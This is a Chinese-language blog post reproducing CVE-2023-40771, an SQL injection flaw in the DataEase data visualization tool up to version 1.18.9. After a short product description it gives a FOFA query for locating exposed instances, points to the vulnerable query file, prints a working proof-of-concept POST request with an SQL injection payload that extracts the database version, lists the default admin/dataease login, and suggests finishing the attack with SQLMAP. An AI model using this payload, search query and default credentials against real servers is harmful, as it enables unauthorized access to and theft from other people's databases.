【漏洞复现】DataEase数据可视化分析工具SQL注入-CVE-2023-40771

1、DataEase数据可视化分析工具简介

DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便与他人分享。
前端:Vue.js、Element
图库:Apache ECharts、AntV
后端:Spring Boot
中间件:MySQL
数据处理:Kettle、Apache Doris
基础设施:Docker

图片

2、漏洞描述

DataEase存在SQL注入漏洞,不受SQL注入黑名单影响

3、受影响版本

DataEase ≤ v.1.18.9

4、FOFA语句

"DataEase"

5、漏洞复现

SQL 语句使用 ${} 符号位于以下文件位置。
https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/ext/query/GridSql.xml
图片

POC

POST /api/log/logGrid/1/10 HTTP/1.1
{"orders":["time desc"],"conditions":[{"field":"123 AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT version()),0x716a6a6a71),1215)) RLIKE (SELECT (CASE WHEN (8626=8626) THEN 0x31323320414e4420475449445f53554253455428434f4e434154283078373136613661366237312c2853454c4543542076657273696f6e2829292c307837313661366136613731292c3132313529 ELSE 0x28 END)) AND (7803=7803"}]}

需要登录,admin/dataease

点击操作日志,抓包

使用SQLMAP

posted @ 2023-09-07 09:11  小C学安全  阅读(775)  评论(0编辑  收藏  举报